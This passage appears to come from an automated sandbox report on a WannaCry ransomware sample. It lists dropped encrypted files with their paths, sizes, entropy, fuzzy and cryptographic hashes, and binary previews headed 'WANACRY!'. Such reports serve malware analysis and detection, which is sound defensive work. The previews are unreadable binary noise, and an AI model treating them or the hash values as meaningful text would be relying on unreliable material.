                                                                                      Preview:WANACRY!..... b...t.hkG.....u.L.....&!....2..A,....3..........P.R.)<$.#.h..I...^>.~.:......|j.a..M.?`..1n.....l/......L.'b2.^.4"...........E....]G...nw.......:.2.q.=.4..._.....S.t'a...T.*.H....t.........h......[..d..pw...+..!.>..n#.....~.0$..~...}.H.n8Y.2..............&3. .._"0F.....IA@....p..Q...@|:7-..y.T..$F.a....j......R...7q.`.,n.lB.r\GW.j.b.wm..c....z......r.Z.a.{I.*..i..o....Tk..T#,. IH..),-..Nj_z....+._...,\.*...[q...M..H:.L.VE.w......i.........,..M.U....E..T2)`g^.O....Be..N...~!.;bQ{.......c]!+.F.+Iw..,.}(v....!....a. ..e.R.*..6....\..f=.../.........>O.mj.a"Dk..F......5g.|y.a_...HA#9...Mj..........+%,....*...vz....v..O.#..^..F.LP..(........._.9Z.h.aqI...o.J.r8....=...Vu....U/l..".......[9...=.8...-T....C.....We..m.\.......-5a........D..[...m.....C...o0b.!.Z... ....Bg@Z.<.]Sz..-hF..z....i.{......2....Q.....4BIT..c52.l.)...N.c....V..F8v...iO2....3.<..m.1R.UU..d7l.n+u....f.?-.1...}P.J..o.\..2?#.?.O....*.bV2..h4.9.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.86251011950763
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkE1T7tUJpCOvg8w3t5b/3P8ckg4zQRVQCLp/GgD81Tk0tvv6Nf4j9Ulb5PrEs4m:bkQcvM3/b/aHzQRVQCl//1m36NAjWb5R
                                                                                      MD5:0DBD778E464173D29DCA9A335BA87BA3
                                                                                      SHA1:B647E0865AF65DB746012EC517579DD7E6E00FEB
                                                                                      SHA-256:70E46519F924D51E2011EA8EB76DDB068AB44572C5AD7CCE3AFDCBA8AE1154BE
                                                                                      SHA-512:65F9C6E5CFB33ED6C136F86B70DD7910719927BB3DADE3A8377C255E2188F280579FDEF4AB3731AE1CD56A77E43B4D1BEBB0C23DC96BE820407E8403A4E274B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..... b...t.hkG.....u.L.....&!....2..A,....3..........P.R.)<$.#.h..I...^>.~.:......|j.a..M.?`..1n.....l/......L.'b2.^.4"...........E....]G...nw.......:.2.q.=.4..._.....S.t'a...T.*.H....t.........h......[..d..pw...+..!.>..n#.....~.0$..~...}.H.n8Y.2..............&3. .._"0F.....IA@....p..Q...@|:7-..y.T..$F.a....j......R...7q.`.,n.lB.r\GW.j.b.wm..c....z......r.Z.a.{I.*..i..o....Tk..T#,. IH..),-..Nj_z....+._...,\.*...[q...M..H:.L.VE.w......i.........,..M.U....E..T2)`g^.O....Be..N...~!.;bQ{.......c]!+.F.+Iw..,.}(v....!....a. ..e.R.*..6....\..f=.../.........>O.mj.a"Dk..F......5g.|y.a_...HA#9...Mj..........+%,....*...vz....v..O.#..^..F.LP..(........._.9Z.h.aqI...o.J.r8....=...Vu....U/l..".......[9...=.8...-T....C.....We..m.\.......-5a........D..[...m.....C...o0b.!.Z... ....Bg@Z.<.]Sz..-hF..z....i.{......2....Q.....4BIT..c52.l.)...N.c....V..F8v...iO2....3.<..m.1R.UU..d7l.n+u....f.?-.1...}P.J..o.\..2?#.?.O....*.bV2..h4.9.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.809889432837915
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bzRy3J5wb5sPfwCgtn7KKR5cmFRYBOSBRxJAc9XTHFbH:MihZ7Lf3F2cGxl9XTlr
                                                                                      MD5:ABC510663C65A570DD58BCEA14123AA6
                                                                                      SHA1:483EA5804EB701FE9D647349005F295DF7186C62
                                                                                      SHA-256:CBAD590D9677BA0D19476E3815F2809FAA093780A7146E65ECDC1162C3F0AD01
                                                                                      SHA-512:4180D79C80AF257BB61E99FB7A204FE300B103C706EA3BC37B68387982DA5F566157E3DE1CCA894D0C9DDD8580523C3B8CBE7390D3B499137385D8805B0EEFFD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.;...p...0{.<^=(x..-...........T...c..u.t..e..P......H.......7k.m...E`.7).{z.,nk.I.wv..K[1.k]u..n.y.ZX......!..)..[...{.nP...Az.^.....:M..9.jH((.5...9...g.(.T.K.Y....z..9..e......k. .....p,K.j..iY..f.oD...JY.'...@..zB`...e.Q.vR.U)4...=.E[.f?J,..jY...6..}'C.`.>U.[..V..1X....mPkA.l+.^V..B.:H.e...E...qs.CJ..g..[St.1..1..v..o.){..{.J.".8.x..:W...1.x.:_...at.I....}.F..VA...].Y.K.`].8.?...:hj..6...TZ.#....e...C.......y ...$:......NJ...g....&z...?+.O.V;....K..Lje.t9.......4.....W...C.%....?.....f.U=qf.m.M.8.....1R.......b;.2 ..Y,<.....B...n...M...'.Z7..X'T..f.....;./.hG...>..X.).!$.w.4....Lt.I.b.Ps.....A5..m.;U...^....MqH8\n.wn1\N..F.\.Z<..Dz..V..aj..G.aD..?5.....|...<.s .#.....W.0.2...Y.....B.....t....h.....md......x$.ue8.$.=.P....&2.\....p...k....5..h/.8.Ad.........l..?8.^...;z...4O.s..!6C'H4... ......4...>. ...\..1....H.;.j.M.D..C..X..lt.z.uE..b7'...}........?.)...IT.p...(.n.a.l......N.._:....\...<......w..3...L.....1..k...)5.....@I.k.v.u5.n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861191962506949
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkaNVr5Tz3vxCOteU8tZMRQJEDBk/EE/piafMRekjyKhoHRjFcYuRRs:bk6t3JCOtJ8tZ1yDO/X/piafMJEj+YCs
                                                                                      MD5:B6A95B285DF02FA71E1BD3D077AA4330
                                                                                      SHA1:DC0E6CF2F81685B66C3B87008AA00DA4B6756C7F
                                                                                      SHA-256:D4B57DE2528811665D97B880664C39372DD8DA77FE493D4B867985F86B7BFB42
                                                                                      SHA-512:C419F5A7D3AC96DF694ED9A53DAFE647C073AD7ED798082EE4514DE6AF3199625B8781532743C4BBC75DC8795FCE032D5A935706142DFC06F0DD708210D9E9E3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....~s.-..WC...-.....a..7..BU5....~.Fu.......~..-....6.}V.i.xcG...I....w..x............RW.Ic..g.AlT....D./#..Y*.&.....^y..C..z.7[.M.h>s..g.B/.L>`(..=X.s....-4F.R..jK.....Y ...n5....:...V..[....iZ.a...`..!.k..A...M..S.&.+.*c6...X....?y....5M............Q....z@../.....R~.!$..........|..Ns#....2....o...^.~.J.Cx.x.....h=.;.%.[b..7.._....7......B.>..+V.5..U.5VOE.,..A...9.{.._m}P....X..8"Em....2L.GN~9 6K[m&.....u9.ci...C.|.w..m..RW.bO./...=...U..u......E...$.9...p,].. ..._.E...`,.-w.?...q....O...`*.S1..d..6[...3.(.F.._vP1_]m(....{.......[....1...F....&S.....j:..F.z..j..:..........b..h...D.........h.[.....:.....$_.8f..;....Y[.X..1.&..8;.lm.Wn..%.....k..N...G.u..t.F.+e+..........@..2....qa4B.J....)a'.=...j)'v.....84d..j.W;..8".|./.C?."....C.6`.I...^Y..."..f=..o..YU.............K....*t1.z...H.e.C._z...80-`..l....7.}....,I..t...r{..&.L......!-.e..}..#.%<^.k.......6.E..P.P5;Q8...`._}X...>LY.u.L.A.`p*..c......A.).s|].I..zM....D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861191962506949
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkaNVr5Tz3vxCOteU8tZMRQJEDBk/EE/piafMRekjyKhoHRjFcYuRRs:bk6t3JCOtJ8tZ1yDO/X/piafMJEj+YCs
                                                                                      MD5:B6A95B285DF02FA71E1BD3D077AA4330
                                                                                      SHA1:DC0E6CF2F81685B66C3B87008AA00DA4B6756C7F
                                                                                      SHA-256:D4B57DE2528811665D97B880664C39372DD8DA77FE493D4B867985F86B7BFB42
                                                                                      SHA-512:C419F5A7D3AC96DF694ED9A53DAFE647C073AD7ED798082EE4514DE6AF3199625B8781532743C4BBC75DC8795FCE032D5A935706142DFC06F0DD708210D9E9E3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....~s.-..WC...-.....a..7..BU5....~.Fu.......~..-....6.}V.i.xcG...I....w..x............RW.Ic..g.AlT....D./#..Y*.&.....^y..C..z.7[.M.h>s..g.B/.L>`(..=X.s....-4F.R..jK.....Y ...n5....:...V..[....iZ.a...`..!.k..A...M..S.&.+.*c6...X....?y....5M............Q....z@../.....R~.!$..........|..Ns#....2....o...^.~.J.Cx.x.....h=.;.%.[b..7.._....7......B.>..+V.5..U.5VOE.,..A...9.{.._m}P....X..8"Em....2L.GN~9 6K[m&.....u9.ci...C.|.w..m..RW.bO./...=...U..u......E...$.9...p,].. ..._.E...`,.-w.?...q....O...`*.S1..d..6[...3.(.F.._vP1_]m(....{.......[....1...F....&S.....j:..F.z..j..:..........b..h...D.........h.[.....:.....$_.8f..;....Y[.X..1.&..8;.lm.Wn..%.....k..N...G.u..t.F.+e+..........@..2....qa4B.J....)a'.=...j)'v.....84d..j.W;..8".|./.C?."....C.6`.I...^Y..."..f=..o..YU.............K....*t1.z...H.e.C._z...80-`..l....7.}....,I..t...r{..&.L......!-.e..}..#.%<^.k.......6.E..P.P5;Q8...`._}X...>LY.u.L.A.`p*..c......A.).s|].I..zM....D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.7649740769950935
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:POEk1qOgjYvI3+gvzvL/G+zTUVr+Sc6vx2f:POj1qOk+grvrfCivgG
                                                                                      MD5:FBD97B74B378466B0CE18D3DBD4F6DD4
                                                                                      SHA1:6DB08F5C535B96E0BCCF6C237F7D4020C7A6D155
                                                                                      SHA-256:ECF3B2431799EC84E6E690F4D62755B1BE2F892A066F6607E6C5CBCAF4B7A1B0
                                                                                      SHA-512:BA0BD057A0C7AB5364FB75D84F68679EB9CDAE6DAB0990F1783F857BC9CD6533ED024DAE61A1715DD7B25E4C65834D25C90CAF46B84E1169543B477EABE8EE9F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..>'.i.......A.e.>....'5.[..'61<r.Uf..\.P..n.....R..... ...IT=.._l....g...P..2...n....1.\..\...-..6..X..._J.(q|...?...z./........1.....!....8.@.k`)/......^M.<.&...O...k.K.v.[.!W"...%@..,..X....R.9[...-Qk.$...(.B..GN|;.._..8...z...v.`........)0L%..f.T/..o.W.c.J....M.....gP.d..'..r*.DW...p..I....c.:.00Pz..2].a....".....$....l<.$6..?.t..!...e.cN.%....N.''....j.x.IC.1...5.+......C...e9.Q.?.z.....r......u..K..B.z*.....$XZ..z? ......%p..\._w..[...-....H...g.2U....'...a.q..........?.z.2l....j%....7Y.......a.L..L...?....Tf..I.\u]...B.....4}*.H.z......T.e.-...C.[A......Hk#....)%..Hz...jN...2.l....M.Ny......R.D<.....|.D..k._.RKBY............".....]..N.,5yz,pH.u......>...T..$[._..S.....p&x....ak....7.ey......... $@....k..}..x...x.C..d......K..F.\..]?9....M...[~.... ...C{..... >...'....P.2...CU.....4`T...w.?....7..v.."g..E.....c...%M...X9.+.x..za<.a.C.6...2.*....60.6..Q.......m..:.2.7.OL..].......u.]........_........:........,..[$..G....+#
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.870905783744615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkJKNbOEwPExHclwmyHa1sPpEl724t25s4y2Dw+EM9wjq9PU:bkJKQbPa8lwmy61sPX4t25C4wrM9X9s
                                                                                      MD5:D786279AD98D62CB8C3D9B18E850D121
                                                                                      SHA1:8DB4DE4282DF45FF41A756E066FA938606E0CA2D
                                                                                      SHA-256:5DE7CF7E22B0046D3704F26CD6E6394993875178D8E3DC7A42B9FAAF7F9BBDD4
                                                                                      SHA-512:F4651F015D6AF899F46F9ADEEB10498895E512BA613EBB9C614CA0ADB5C53788A79058EC6DB65EA968E51BF89C29024E644A04953A285E110F73E28ED4488559
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X.1\."..V.q+..(q).v}P..d........PJ..9....`......6..0...$....h.-..d.)Xh.....rA.GL@.{l.....l..M8.!+{....o.=..]6T...s.E.x.d.9S.=..<..e...p.c<b7..T,.3[@.........W.).<..(.EF.[....5.'.9..;nW.@.=..KA..X.P..Qm...c4....d#.,.P.".]...~..x..k.b...r_....v.............j~.uEQ..p._.W...|.....p.....=:....1.......R.H.K.y.......$..h 77..1^-*="K....O9M.....at...w>.v..../.R..\.P..*.....%..WlE.$W...(..O.i..ft...#.6.....^n.[......;..q....[.z....D%!.J....A..>.._..*.5i....w^O..1.2v.{0.D._....e./.....0y..H.]?H..g...c7.!..,...0!....kv.K.(8..?.....:l..oP....!.Q..pL`. xEY.;..=yjIN.5]U.-.......o...nu.d|...~.`.^4q.`..K...u."0 .#[....V....1F.....d..n.;..t.4.P..r1y..D...paW!..+.....T....l@i. .B.....-n...B".{..E.7.CC.:..-r........X.LCi..ATn...z...kL..F......t..H...I.=...H.dA.D.Y...U....q._f/..ei.l,!.hF...........>.fu.....T.!{.J!g.....v..y.....%[..T2...;.,R..`D.N>t..X.`.4..l.o....F...M..._B]%..s.nk...>~..:J.......|...i'.TX...p.w...e..55B..3..G.&......@.AP...j....|..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.870905783744615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkJKNbOEwPExHclwmyHa1sPpEl724t25s4y2Dw+EM9wjq9PU:bkJKQbPa8lwmy61sPX4t25C4wrM9X9s
                                                                                      MD5:D786279AD98D62CB8C3D9B18E850D121
                                                                                      SHA1:8DB4DE4282DF45FF41A756E066FA938606E0CA2D
                                                                                      SHA-256:5DE7CF7E22B0046D3704F26CD6E6394993875178D8E3DC7A42B9FAAF7F9BBDD4
                                                                                      SHA-512:F4651F015D6AF899F46F9ADEEB10498895E512BA613EBB9C614CA0ADB5C53788A79058EC6DB65EA968E51BF89C29024E644A04953A285E110F73E28ED4488559
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X.1\."..V.q+..(q).v}P..d........PJ..9....`......6..0...$....h.-..d.)Xh.....rA.GL@.{l.....l..M8.!+{....o.=..]6T...s.E.x.d.9S.=..<..e...p.c<b7..T,.3[@.........W.).<..(.EF.[....5.'.9..;nW.@.=..KA..X.P..Qm...c4....d#.,.P.".]...~..x..k.b...r_....v.............j~.uEQ..p._.W...|.....p.....=:....1.......R.H.K.y.......$..h 77..1^-*="K....O9M.....at...w>.v..../.R..\.P..*.....%..WlE.$W...(..O.i..ft...#.6.....^n.[......;..q....[.z....D%!.J....A..>.._..*.5i....w^O..1.2v.{0.D._....e./.....0y..H.]?H..g...c7.!..,...0!....kv.K.(8..?.....:l..oP....!.Q..pL`. xEY.;..=yjIN.5]U.-.......o...nu.d|...~.`.^4q.`..K...u."0 .#[....V....1F.....d..n.;..t.4.P..r1y..D...paW!..+.....T....l@i. .B.....-n...B".{..E.7.CC.:..-r........X.LCi..ATn...z...kL..F......t..H...I.=...H.dA.D.Y...U....q._f/..ei.l,!.hF...........>.fu.....T.!{.J!g.....v..y.....%[..T2...;.,R..`D.N>t..X.`.4..l.o....F...M..._B]%..s.nk...>~..:J.......|...i'.TX...p.w...e..55B..3..G.&......@.AP...j....|..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.820695425765881
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:JQQBXpz31KO6AismlOt3l9TfzXu6++OETVZINgVX7zY4GZrcsZX1Sh7:JQQB5zp6AiQ3lRf66+SjIk7zYRYsZXM7
                                                                                      MD5:DBED66C1E6F85CAD024064A8F4753BB3
                                                                                      SHA1:578616EC1C5AA7558AEBE848C5B4FBED19FBFEFE
                                                                                      SHA-256:271BC69A0B3D096D690BE4E74049EE48BD493431D3B2B371F75B844E5C1AC8A4
                                                                                      SHA-512:48FA278EEA9479F5F7365524BCC5BF8454E209DAD09BF19642D532358C50F24AC97615D1874257D59A0C4AE04AA4276F33F58B2273352D6CED0B7F2CB20A1C28
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.\j..?....A..g......=."3..v..f+T..v.f.GJ...t..$\.K}...$...X.f...Wq.\..S...=....c.g......z.....?..e.^...1.iQ.....H27k[....5......|I.........\....@C.............su,.7m5...;./.9..?8..._..m.a..k.....&..M.. .O./...O\...&.+..9Jx.9..}.d.F.jg..-1Z...zW.........&...s.@(..yt.......%Z.......31..msY{L.....k..arxM...c.#f....R.t.4b.h.........C.....+.T...1.9..o.I....s)..2gz..;*.}.6B.[...7.6;......-G.QG.'...S.....2{..-.x./&..{.IS.L+....%....o......{m..K...qK.8...q.72.....y.&....A.3.....[?....g...',..5y...'.........7Fj.....S..A...m.].&..B>.\kS.F=g..O.x.>..../x........06../....hU.4$`.1..........f......9.2......Wa...ld..;$.*..e9...)...C,$..Z\tVy.6.Q..,.I..kE..p....D......[.v5..H.*....b....DT...........@..........?).}..V.!N.\ni.a......B.T.0..).D#..Z....?;.+.....*]w..mr...6.o.]c.....->......UZ...:{w..&^....?.......o.Y..>..o....=ro.........._.......ZZ..-3.t...i.:...).s~....>._1.!.#..9..B..6.e..S4....{...fV..1..b...!...1`:?...C.z....>..%N|...e#.sP}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.87723748108337
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkNIEdAqrvWhesRt5SDH+wG4Dc1H4hxeVH3xjco14chvUvqrBi/71XH:bkNpdxrehesY+whDcyc1cjcpO5H
                                                                                      MD5:52749DCE8408EFFD42E1021B2E6B4956
                                                                                      SHA1:D444309E746B3B589F84D0FD43A14A2CEDEAA134
                                                                                      SHA-256:7EC6F79913B08F4DDE93F846F01D4D1C9B1F99F1C12552897FDA3AE126ADAE7E
                                                                                      SHA-512:FA6748107CF360553F2F06C44663AB0BA02602709EA7A82D6DD300B4B311374876CB447C4981BDEAF1F9CFD73B8223BDE561A2E30779AB0CE227CD068955C845
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....|.m.D.v.Z*A..B..|.Z.....x.........=.\...u.3.E`..+....,g@..g$..RM...9<.......k;....=.tK.k.u.q.."...%.1....%..f#.....%.T..-/....g......G).q.+.P+...(.&....oX...b..T.4,.v].M.+..,sl.\P.W..~...g.8.C.....U/.....; ..f...q...o.]..M...!A=.s..L.Xl.{..B..e.............n...:.l[.0....\...$...r.z.A...l....}........}.'Eo.c.>..8.@.|.3........F..x\.{.o....h>..a..1.Y.kxs....?3'[8Y.F.6h.45...[.x......e........&....f.$..Wr.j.....&z.... ..w:S.~`1.Kr_.$..-Z/..O..3Jm..(...U.(....."....,h h.1..'..U...b......:2J..1.`e.:fE.3..7.s..`|.=0.j'.g..v.].].......Fa.w.!.>ql.......t...1..9...V..6.>..V4.X4..}gS..*.|...U.ncm.|.IX.......p.@.:.m.qM.G./s5..W..g..[.FX.....X-..7.^....cT,?.,.U.@Y....pD.2.{...O)n....G........2t....dy+......@}.Y.d.}..O..S5_..0..W.....Z.U.}N..'r..K.y..g....f..P.9].OiI..L7_...{.....#.....Tj.......'.9..<eF...7.g.]...;.."..;.y..t4.T...V>E.V.w...g.....s.J^...8F...........g..$`....j*....#....8..$......(b&K).......V|..~iq.;.34$8~.Uk..gG. ...E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.87723748108337
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkNIEdAqrvWhesRt5SDH+wG4Dc1H4hxeVH3xjco14chvUvqrBi/71XH:bkNpdxrehesY+whDcyc1cjcpO5H
                                                                                      MD5:52749DCE8408EFFD42E1021B2E6B4956
                                                                                      SHA1:D444309E746B3B589F84D0FD43A14A2CEDEAA134
                                                                                      SHA-256:7EC6F79913B08F4DDE93F846F01D4D1C9B1F99F1C12552897FDA3AE126ADAE7E
                                                                                      SHA-512:FA6748107CF360553F2F06C44663AB0BA02602709EA7A82D6DD300B4B311374876CB447C4981BDEAF1F9CFD73B8223BDE561A2E30779AB0CE227CD068955C845
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....|.m.D.v.Z*A..B..|.Z.....x.........=.\...u.3.E`..+....,g@..g$..RM...9<.......k;....=.tK.k.u.q.."...%.1....%..f#.....%.T..-/....g......G).q.+.P+...(.&....oX...b..T.4,.v].M.+..,sl.\P.W..~...g.8.C.....U/.....; ..f...q...o.]..M...!A=.s..L.Xl.{..B..e.............n...:.l[.0....\...$...r.z.A...l....}........}.'Eo.c.>..8.@.|.3........F..x\.{.o....h>..a..1.Y.kxs....?3'[8Y.F.6h.45...[.x......e........&....f.$..Wr.j.....&z.... ..w:S.~`1.Kr_.$..-Z/..O..3Jm..(...U.(....."....,h h.1..'..U...b......:2J..1.`e.:fE.3..7.s..`|.=0.j'.g..v.].].......Fa.w.!.>ql.......t...1..9...V..6.>..V4.X4..}gS..*.|...U.ncm.|.IX.......p.@.:.m.qM.G./s5..W..g..[.FX.....X-..7.^....cT,?.,.U.@Y....pD.2.{...O)n....G........2t....dy+......@}.Y.d.}..O..S5_..0..W.....Z.U.}N..'r..K.y..g....f..P.9].OiI..L7_...{.....#.....Tj.......'.9..<eF...7.g.]...;.."..;.y..t4.T...V>E.V.w...g.....s.J^...8F...........g..$`....j*....#....8..$......(b&K).......V|..~iq.;.34$8~.Uk..gG. ...E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814394159845375
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:McpkNJGcg1SJKMYipKOUg5rDrDZFCLiQiuycnd5N7+Jmm0/N2lI:MwkNJGx1qXYiSg5rDrD6iSnd37+Jmm0b
                                                                                      MD5:8F5D2DA2036D782C03DAFACD29AC0346
                                                                                      SHA1:DD8649CF1335C21B06247EA2123F1A688039A06A
                                                                                      SHA-256:DB72259C5CA12EFAADCFC053FC55A47548F78365DB59380ECCE7F0E0E62AB0D3
                                                                                      SHA-512:AF04F6873F0B933143A8ED58562D70F05C5042616E9BB15978E4D4BEC6B1FEAB01C63258C37D2EB83E038FC1C09B2EEDA4FC1185017A43711F445B64F644951B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:A.i%.J..|F>R.F.n#.$E .|....!X..S.8.....G. .RI2..S...hS,h.......{f..4..dY.j#).>.3.,..Y.. .="..........5....{G..d.|..ra:.fP.....sB^=..o....`n.t.."f.....N..r.m.X...+A.A..Q@..W...A.....6a..Y<.3..D....V.e.s...d..}...=......m......K..1.B.....N<.Bl[.J.l....v.jn..x.<$.(.q+3....)q...,.u>)O..q.M4.A%..8.e.\+tOHCYc....V.Q.H....w.r>...@,....,.a...'.r6]1......K._...4 ..6s.w.lKY...X.......%.:..1-.i.....Ys.-.Vl^7)...^)k....._@...LvOi`...'Wwv....yX.M..9..K.\i...t.k4t.C?=M...G..6.X`.(...K5!..}.a.'.2.b..#...b..I...Z..k..2*.....kS1.....lo....,9.O\......?. D.L.VS..5.o.N....WgL....y..._."7....D.Zf=D..3s..8J....;............g.Nv.6.x...{"...1"..."3../ajn.cUQ._..j:q.8.B:...C.v..@.a.3hd....M6...".@..m...<....O...vYr..pp.......M.r.5...,.. ... .....?.7Ng.F...k....XX.)....!.......vK...IH.......x..(=n.x.7..@.g.H|...Fy...(/.PPO...|G.xK.. `.4.*....G`.T_..6.0}.8..Z.}.Y>...4...6.e.(.e..k.an...".|......BU.0.?."..U..<S-.ez.#.N.:.).0..jRe.w..Y.6#..M..n.P.1#.i....*.=..b.}jG...fp.x.H..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84028114339583
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMzgJhT9lP6on899meNymvg8uUkcPajmSXAaqV/++V6iqnnDKhhaC7V1InWuNWp:bkMzgJ/j897NymI8uUjyjmSXAaqpbV55
                                                                                      MD5:497076BA85BB7FB049530E97F23A3B65
                                                                                      SHA1:968519BB7DB0B50E5E00F5FA881B470526E5EA77
                                                                                      SHA-256:E5EBA1D3CA52120AEDAB169AF7D66F47076B4B3DAB1B93411F6EB345C41F6C7D
                                                                                      SHA-512:3DE906F14AB228AB7CF9290A0DA6A4650483B2C3B205B15A0C9ED2FB6C0C58CC6E81B3F734BA563FBC3038C23C120D8A93E810A4192C6E9370949C5D01C102B4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....i.g*.{.......j..3..,.%.[.W-.$Cr[$5...z*.....b.6':....0R....W,f*....S.\...kf........S.x/%...L..v@\..U.d....2.d..y...>.U.h..'@....e!.{.B.6Ps0'.L..6u.s....AT|..3HhdP.%.A.YdE.PE.$i....2..........!f7.h.....MC\..F..YcJ-..S.....{..bNL.%....>..19............J.z....n....a........._......._.IRi........Y.Zd....n6..lh$...^..X!]j..l8B...T~sx..#...Iv...M..BAt.9s.lB..p..g......<R.M..+%......S#..`^R...H...%.;..R..<...[.q4D.~....t...=h.C.d....q.*....q~S.D.....D...ks..p...T...&.9g...U.z..4'7Q.r..?..w......r...-..L.,cK.&p......g..3.(-...0......2.>.>KW..X...f.*.....ZL.\@d.gW...K.M...K..tI.`..L.....V...Y$.]D3.3#g.i...;-.%.A...~. ....iN..:.6..N..;%G.\L..f1..m'.V.T(F...O\/V......k6.....p..xN.Xr....[..P..o..0.i...a....z..G..tp.5k...........%..Z.j...2...V..>!...j..HP...+p-.Vab.:4.<M!.y;<o...0c.!~.I._1ZE$......!F..<.7..#....E.....6z.i.#.Y.-7....../.......M..B......8,.1..k.%... -...-7`...C.->.G.1.35P5.....?DU..O.Ru.._...Q..9~.E.{.S.S#.F.P
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84028114339583
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMzgJhT9lP6on899meNymvg8uUkcPajmSXAaqV/++V6iqnnDKhhaC7V1InWuNWp:bkMzgJ/j897NymI8uUjyjmSXAaqpbV55
                                                                                      MD5:497076BA85BB7FB049530E97F23A3B65
                                                                                      SHA1:968519BB7DB0B50E5E00F5FA881B470526E5EA77
                                                                                      SHA-256:E5EBA1D3CA52120AEDAB169AF7D66F47076B4B3DAB1B93411F6EB345C41F6C7D
                                                                                      SHA-512:3DE906F14AB228AB7CF9290A0DA6A4650483B2C3B205B15A0C9ED2FB6C0C58CC6E81B3F734BA563FBC3038C23C120D8A93E810A4192C6E9370949C5D01C102B4
                                                                                      Malicious:false
                                                                                      Reputation:low
